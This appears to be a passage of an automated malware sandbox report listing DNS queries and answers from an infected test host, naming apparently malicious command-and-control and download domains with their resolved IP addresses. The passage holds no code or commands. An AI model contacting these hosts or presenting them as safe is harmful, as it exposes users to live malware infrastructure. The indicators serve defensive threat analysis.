                                                                                                                                                                                                        Jan 4, 2022 19:33:42.671868086 CET192.168.2.58.8.8.80xdb32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:42.878957033 CET192.168.2.58.8.8.80xda5bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.082484007 CET192.168.2.58.8.8.80xace2Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.530966997 CET192.168.2.58.8.8.80xe291Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.755482912 CET192.168.2.58.8.8.80xbe44Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.944658041 CET192.168.2.58.8.8.80x50d2Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:44.127238989 CET192.168.2.58.8.8.80xfbffStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:44.359674931 CET192.168.2.58.8.8.80xb809Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.159487963 CET192.168.2.58.8.8.80xfe7dStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.899182081 CET192.168.2.58.8.8.80xbcb0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.899224043 CET192.168.2.58.8.8.80x75bdStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.156876087 CET192.168.2.58.8.8.80xe695Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.337910891 CET192.168.2.58.8.8.80xe22Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.527611971 CET192.168.2.58.8.8.80xf446Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.782988071 CET192.168.2.58.8.8.80xe2bcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:49.615017891 CET192.168.2.58.8.8.80xf5c2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:50.413440943 CET192.168.2.58.8.8.80x229bStandard query (0)f0616068.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.840620041 CET192.168.2.58.8.8.80x552eStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.842330933 CET192.168.2.58.8.8.80x20b7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.032028913 CET192.168.2.58.8.8.80x7863Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.235112906 CET192.168.2.58.8.8.80x5562Standard query (0)vk.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.874588013 CET192.168.2.58.8.8.80x6dd4Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.889983892 CET192.168.2.58.8.8.80xb791Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.095582962 CET192.168.2.58.8.8.80xb3a8Standard query (0)natribu.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.359882116 CET192.168.2.58.8.8.80x463Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.645442963 CET192.168.2.58.8.8.80xeeb3Standard query (0)natribu.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.882695913 CET192.168.2.58.8.8.80x6c1fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:57.091738939 CET192.168.2.58.8.8.80xd80fStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:57.651737928 CET192.168.2.58.8.8.80x77faStandard query (0)mstdn.socialA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.141839981 CET192.168.2.58.8.8.80x9f39Standard query (0)qoto.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.661042929 CET192.168.2.58.8.8.80x21acStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:01.010947943 CET192.168.2.58.8.8.80x38e7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.255312920 CET192.168.2.58.8.8.80xcf58Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.317835093 CET192.168.2.58.8.8.80x99Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:13.948523045 CET192.168.2.58.8.8.80x644dStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:15.646044970 CET192.168.2.58.8.8.80xfa2cStandard query (0)f0616071.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:18.409645081 CET192.168.2.58.8.8.80x635bStandard query (0)f0616073.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:25.871715069 CET192.168.2.58.8.8.80xc663Standard query (0)kent0mushinec0n3t.casacam.netA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:52.711987019 CET192.168.2.58.8.8.80x6309Standard query (0)patmushta.infoA (IP address)IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 4, 2022 19:32:46.353008986 CET | 8.8.8.8 | 192.168.2.5 | 0xa222 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:46.541034937 CET | 8.8.8.8 | 192.168.2.5 | 0x1dac | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:47.085211992 CET | 8.8.8.8 | 192.168.2.5 | 0x3779 | No error (0) | privacytools-foryou-777.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:49.419750929 CET | 8.8.8.8 | 192.168.2.5 | 0xc7a1 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:49.620958090 CET | 8.8.8.8 | 192.168.2.5 | 0x6825 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:49.810087919 CET | 8.8.8.8 | 192.168.2.5 | 0x32ab | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:50.031019926 CET | 8.8.8.8 | 192.168.2.5 | 0x8894 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:50.579771042 CET | 8.8.8.8 | 192.168.2.5 | 0x737b | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:51.108448029 CET | 8.8.8.8 | 192.168.2.5 | 0xd2c8 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:52.495677948 CET | 8.8.8.8 | 192.168.2.5 | 0x6d65 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:52.725264072 CET | 8.8.8.8 | 192.168.2.5 | 0x9137 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:53.194371939 CET | 8.8.8.8 | 192.168.2.5 | 0x94cc | No error (0) | data-host-coin-8.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:58.915494919 CET | 8.8.8.8 | 192.168.2.5 | 0x1aac | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:59.117124081 CET | 8.8.8.8 | 192.168.2.5 | 0xe35f | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:59.346348047 CET | 8.8.8.8 | 192.168.2.5 | 0x8438 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:59.693615913 CET | 8.8.8.8 | 192.168.2.5 | 0xe561 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:59.883378983 CET | 8.8.8.8 | 192.168.2.5 | 0x704a | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.179717064 CET | 8.8.8.8 | 192.168.2.5 | 0x5d01 | No error (0) | unicupload.top |  | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.243674040 CET | 8.8.8.8 | 192.168.2.5 | 0x7970 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.487281084 CET | 8.8.8.8 | 192.168.2.5 | 0xe4e9 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.679090023 CET | 8.8.8.8 | 192.168.2.5 | 0x4743 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.875922918 CET | 8.8.8.8 | 192.168.2.5 | 0x519a | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:01.073401928 CET | 8.8.8.8 | 192.168.2.5 | 0xd873 | No error (0) | data-host-coin-8.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:01.228178024 CET | 8.8.8.8 | 192.168.2.5 | 0xda71 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:01.433686972 CET | 8.8.8.8 | 192.168.2.5 | 0x4d1b | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:01.618597984 CET | 8.8.8.8 | 192.168.2.5 | 0x2fd5 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:03.967916012 CET | 8.8.8.8 | 192.168.2.5 | 0x976c | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.256407022 CET | 8.8.8.8 | 192.168.2.5 | 0x31e8 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.689863920 CET | 8.8.8.8 | 192.168.2.5 | 0xc580 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.959872007 CET | 8.8.8.8 | 192.168.2.5 | 0x41f1 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.959872007 CET | 8.8.8.8 | 192.168.2.5 | 0x41f1 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.959872007 CET | 8.8.8.8 | 192.168.2.5 | 0x41f1 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.959872007 CET | 8.8.8.8 | 192.168.2.5 | 0x41f1 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.959872007 CET | 8.8.8.8 | 192.168.2.5 | 0x41f1 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:06.735904932 CET | 8.8.8.8 | 192.168.2.5 | 0x90ad | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:06.956106901 CET | 8.8.8.8 | 192.168.2.5 | 0x7076 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:07.180413961 CET | 8.8.8.8 | 192.168.2.5 | 0x9148 | No error (0) | host-data-coin-11.com |  | 89.223.65.17 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:19.018482924 CET | 8.8.8.8 | 192.168.2.5 | 0xa28d | No error (0) | microsoft-com.mail.protection.outlook.com |  | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:19.018482924 CET | 8.8.8.8 | 192.168.2.5 | 0xa28d | No error (0) | microsoft-com.mail.protection.outlook.com |  | 52.101.24.0 | A (IP address) | IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.018482924 CET8.8.8.8192.168.2.50xa28dNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:22.009233952 CET8.8.8.8192.168.2.50x5f1aNo error (0)patmushta.info194.87.235.183A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.024240017 CET8.8.8.8192.168.2.50xc31bServer failure (2)srtuiyhuali.atnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.790396929 CET8.8.8.8192.168.2.50xd20fNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.468234062 CET8.8.8.8192.168.2.50x677aNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.667419910 CET8.8.8.8192.168.2.50xeac7No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.881932974 CET8.8.8.8192.168.2.50xaf9dNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:29.113784075 CET8.8.8.8192.168.2.50x391eNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:29.335551977 CET8.8.8.8192.168.2.50x269dNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:30.222142935 CET8.8.8.8192.168.2.50xcc97No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.466578007 CET8.8.8.8192.168.2.50x12feNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.120434046 CET8.8.8.8192.168.2.50xc397No error (0)unic11m.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.514951944 CET8.8.8.8192.168.2.50x4747No error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.146827936 CET8.8.8.8192.168.2.50xaf8dNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.357781887 CET8.8.8.8192.168.2.50x10d6No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.439455032 CET8.8.8.8192.168.2.50xffceNo error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.577033997 CET8.8.8.8192.168.2.50xc629No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.772905111 CET8.8.8.8192.168.2.50x5b0cNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.882680893 CET8.8.8.8192.168.2.50xe0bfNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.024795055 CET8.8.8.8192.168.2.50x8a73No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.226968050 CET8.8.8.8192.168.2.50x5e72No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.226968050 CET8.8.8.8192.168.2.50x5e72No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.423835993 CET8.8.8.8192.168.2.50x4282No error (0)bitly.com67.199.248.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.423835993 CET8.8.8.8192.168.2.50x4282No error (0)bitly.com67.199.248.14A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.630799055 CET8.8.8.8192.168.2.50x3f02No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.820178032 CET8.8.8.8192.168.2.50x95fdNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:36.348193884 CET8.8.8.8192.168.2.50x1073No error (0)data-host-coin-8.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:39.769187927 CET8.8.8.8192.168.2.50x701eNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.029031992 CET8.8.8.8192.168.2.50x2760No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.223347902 CET8.8.8.8192.168.2.50xa59cNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.438524961 CET8.8.8.8192.168.2.50x9126No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.438524961 CET8.8.8.8192.168.2.50x9126No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.650187969 CET8.8.8.8192.168.2.50x5442No error (0)www.mediafire.com104.16.203.237A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.650187969 CET8.8.8.8192.168.2.50x5442No error (0)www.mediafire.com104.16.202.237A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.363959074 CET8.8.8.8192.168.2.50x6e9fNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.579073906 CET8.8.8.8192.168.2.50x6967No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.579073906 CET8.8.8.8192.168.2.50x6967No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | Address | Type | Class
Jan 4, 2022 19:33:41.771428108 CET | 8.8.8.8 | 192.168.2.5 | 0xecbb | No error (0) | www.mediafire.com | 104.16.203.237 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:41.771428108 CET | 8.8.8.8 | 192.168.2.5 | 0xecbb | No error (0) | www.mediafire.com | 104.16.202.237 | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:42.485076904 CET | 8.8.8.8 | 192.168.2.5 | 0x8583 | No error (0) | host-data-coin-11.com | 89.223.65.17 | A (IP address) | IN (0x0001)
